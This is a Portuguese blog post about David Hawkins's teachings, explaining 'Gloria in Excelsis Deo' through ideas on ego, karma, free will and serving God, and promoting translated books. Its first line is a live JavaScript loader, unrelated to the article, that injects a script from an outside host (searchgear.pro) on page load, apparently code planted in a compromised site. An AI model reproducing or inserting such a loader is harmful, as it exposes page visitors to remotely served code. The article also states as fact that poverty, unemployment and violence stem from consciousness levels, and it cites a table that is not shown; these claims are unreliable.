;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Afinal, o que significa "Gloria In Excelsis Deo"? - David Hawkins Brasil
Categorias
David Hawkins

Afinal, o que significa “Gloria In Excelsis Deo”?

Gloria In Excelsis Deo!

“A espontaneidade da vida é uma expressão das essências interagindo sem esforço. O milagre da Criação é contínuo, e toda a vida é compartilhada na Divindade da sua Fonte, já que nada se manifesta exceto por ordenação Divina. Uma vez que a sacralidade da vida é revelada, aí surge o conhecimento do que significa a frase, “Gloria in Excelsis Deo!”.” 

Dr. David Hawkins em “The Ego is Not the Real You”, Parte III, pág. 92

O ego acha que é deus

“Gloria in Excelsis Deo!” significa aceitar que “Tudo é Perfeito Como É” porque tudo faz parte da criação Divina. Toda vez que não aceitamos a realidade como é, é como se pensássemos: “Deus é injusto e se eu fosse deus eu faria melhor”. Secretamente, todos nós acreditamos ser Deus. O nosso ego acredita que sabe o que é justo e o que é injusto, o que é certo e o que é errado, o que deveria acontecer e o que não deveria acontecer. É justamente por acreditar nisso que estamos aqui vivendo essa experiência do que é ser humano.

Adão e Eva

Na analogia de Adão e Eva, a árvore da vida representa os princípios divinos e a maçã representa a vontade de querer conhecer e julgar esses princípios (ou seja, a vontade de ser Deus). Ao morder a maçã, escolhemos ser o próprio deus ao invés de servir a Deus. O que isso significa? Significa que nós temos o livre arbítrio e são as escolhas que nos afastam de Deus, que geram sofrimento por si só, pelo simples fato de nos distanciarem da nossa essência. 

Fonte: Aula da Mentoria Superconhecimento em 15/mar/2023 – Pandora Treinamentos

Deus é Infinito, Infinita Bondade, Infinita Justiça, Infinita Verdade, Infinito Amor e Infinita Paz. Como tal, ele não usa de força. Ele age com Poder. É justamente por isso que temos o livre arbítrio, a essência de Deus jamais permitiria que ele nos forçasse a nada. No livro “Poder vs. Força”, o doutor Hawkins nos explica justamente a diferença entre o uso do Poder, que tem a intenção de servir ao contexto, de aceitar as coisas como são e simplesmente viver em Amor, que é o Verdadeiro Poder, em comparação a força que é usar de força para tentar manipular a realidade a nosso próprio favor.

O dr. Hawkins dedicou toda a sua carreira para nos tirar do interminável ciclo mental de descobrir o que é “justo” e o que é “injusto”, um imenso labirinto onde tudo pode ser válido (relativismo) e só a nossa mentalização sabe a resposta (mais uma vez o ego brincando de ser deus). Ele nos ensinou a sair do relativismo, onde qualquer ponto de vista é válido, e ir para o Absolutismo, onde existe um Deus que é Amor e Paz e nosso único propósito é aceitar isso e escolher servir a Deus. 

Escolher servir a Deus

Servir a Deus não é sobre fazer coisas mirabolantes, nem colocar o outro acima de si, ao contrário disso é colocar Deus acima do ego de qualquer pessoa. É aceitar uma ordem de prioridade nos relacionamentos em que primeiro está Deus, depois meu relacionamento comigo mesmo no qual eu aprendo a priorizar Deus e depois o outro. 

“Quem sou eu para ser brilhante, maravilhoso, talentoso e fabuloso?
Na realidade, quem é você para não ser?
Você é filho de Deus.

Você se fazer de pequeno não ajuda o mundo.
Não há nenhuma bondade em você se diminuir, recuar para que os outros não se sintam inseguros ao seu redor.

Todos nós fomos feitos para brilhar, como as crianças brilham.
Nascemos para manifestar a glória de Deus que está dentro de nós.
Não está apenas em um de nós, está em todos nós.”

Marianne Williamson

Servir a Deus é nos reconhecer como responsáveis pela nossa própria realidade. É reconhecer que a nossa essência é Amor, e tudo o que se reflete, na forma, diferente disso, é porque há algum aprendizado que precisa ser transcendido. Os problemas que acreditamos estarem fora de nós, como desemprego, violência, pobreza, na verdade, estão no âmbito da consciência. 

Na verdade, é sobre o livre arbítrio de escolher viver na vergonha pela sua situação de vida, culpando o governo, o mundo ou o outro pelo que acontece com si mesmo, apático sem tomar atitudes, triste pelo mundo ser como é, com medo de todas as tragédias que podem acontecer, desejando que o mundo fosse diferente, com raiva porque as coisas não são como queremos e orgulhosos do que se conquistou, afinal, foi apenas mérito próprio. 

Impacto do nível de consciência na vida mundana

Veja no quadro abaixo os índices de desemprego, violência e pobreza por nível de consciência. 

Tabela

Descrição gerada automaticamente
Fonte: Palestra dr. David Hawkins em 14/jun/2008

Mesmo o orgulho ainda não traz a verdade, nenhum fator isolado é capaz de causar outro. Há sempre uma sincronicidade infinita de fatores para que qualquer coisa aconteça. A criação e a evolução não são duas coisas distintas, são, na verdade, a mesma coisa. A evolução é a forma como a criação acontece. Nada depende exclusivamente de um ego humano, a realidade é muito distante disso. Tudo faz parte da lei do carma que se desdobra conforme as escolhas de cada um.

“Tudo está acontecendo por si só, nada causa nada”.

A lei do carma não apresenta nenhum tipo de punição. É Amor. Imagina você colocar um assassino raivoso para viver em um paraíso cheio de flores, onde toca música clássica o dia todo. Para ele, seria o inferno e não o paraíso! O amor aceita o que é, e não cria nenhuma resistência (força) em permitir que o outro seja o que é. 

Ao amar, aceitamos que um leão é um leão e precisa matar outros animais para se alimentar. Aceitamos também o que é ser humano. Ser humano é ter liberdade de escolha entre agir como um leão feroz ou ser um filho de Deus. A lei do carma é uma profunda aceitação do que se é, com respeito ao livre arbítrio e total sincronicidade entre os aprendizados de cada ser vivo. A lei do carma, então, é sobre Amor. 

Corrupção Espiritual

A corrupção espiritual vem do caminho oposto do que é proposto por “Gloria In Excelsis Deo!”, é escolher “glória a mim” ao invés de “Gloria a Deus”. Isso aconteceu, por exemplo, com Napoleão Bonaparte, quando decidiu se auto coroar ao invés de ser corado pelo Papa, como todos os seus antecessores. Ele escolheu colocar o seu ego acima de Deus.

Hoje vemos visões progressistas deturpadas, onde há um fortalecimento na crença em que há vítimas para todo o lado, e que o mundo é injusto como é. O vitimismo é uma ilusão, reflexo de achar que o “eu” faria melhor que “Deus”. 

Muitos intelectuais se afastam de Deus porque acham que ao entregar o que acontece a Deus, ou ao acreditar que existe um plano Divino para nós, a pessoa se torna vítima da situação. Na verdade, acreditar em Deus é sair da posição de vítima, e entender que podemos aprender com toda e qualquer situação da nossa vida. Toda a situação que vivemos é a situação perfeita para a nossa evolução, já que faz parte da criação Divina. Compreender isso é nos libertar e ir muito mais longe na vida. Acreditar em Deus é o que realmente nos dá o Poder de ir além.  

Conclusão

O dr. David Hawkins dedicou toda a sua carreira para nos ensinar a assumir responsabilidade sobre a nossa própria vida e nos conectar com a nossa Verdadeira Essência Divina. Ele nos ensinou a sair de um mundo onde há uma visão de predador e vítima o tempo todo para um mundo onde a gente escolhe servir a Deus e evoluir. Um mundo onde entregamos nossos julgamentos a Deus. Assim, o dr. Hawkins nos ensinou a sair do relativismo onde todos os pontos de vista são válidos e compreender o Absolutismo, onde tudo é criação divina, o “Gloria In Execelsis Deo!”. 

Leia Direto da Fonte

No livro “Poder vs. Força”, ele nos ensinou sobre como sair dos campos energéticos que escolhem servir ao ego e nos dedicar aos campos de consciência que servem a Deus. Enquanto que no livro “Deixar Ir” ele resume de maneira muito clara o trabalho, de toda sua carreira, em como deixar ir toda a negatividade que nos bloqueia de um estado de Paz Interior (de se tornar um com Deus).

Além disso, no livro “Cura e Recuperação” ele nos ensina a assumir a responsabilidade pela nossa própria cura e abordar as doenças no âmbito de corpo, mente e espírito. Assim, podemos praticar a espiritualidade em serviço a Deus mesmo nos momentos mais difíceis da nossa vida. Já no livro “Sucesso é Para Você” ele revela como sair de uma mentalidade de escassez para uma de abundância, na qual escolhemos utilizar e aperfeiçoar nossos talentos em prol de servir a Deus. E esses são apenas os livros que já estão traduzidos para o português, há muito mais por vim!

Acima de tudo, trazemos, em nós, a intenção de aliviar o sofrimento humano em todas as suas formas e expressões. Essa é uma intenção do dr. David Hawkins com todas as suas obras e que foi absorvida pela Pandora Treinamentos, justamente pela sua inspiração e pelo compromisso em traduzir seus livros para português. Visto que a Editora Pandora é a responsável pelas traduções autorizadas das obras do professor.

Estão todos convidados para mergulhar nesse conteúdo conosco.

Gloria In Excelsis Deo!

Nota: Toda vez que escrevemos deus com letra minúscula estamos nos referindo a uma visão que o ego tem de Deus que não reflete a Verdade.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *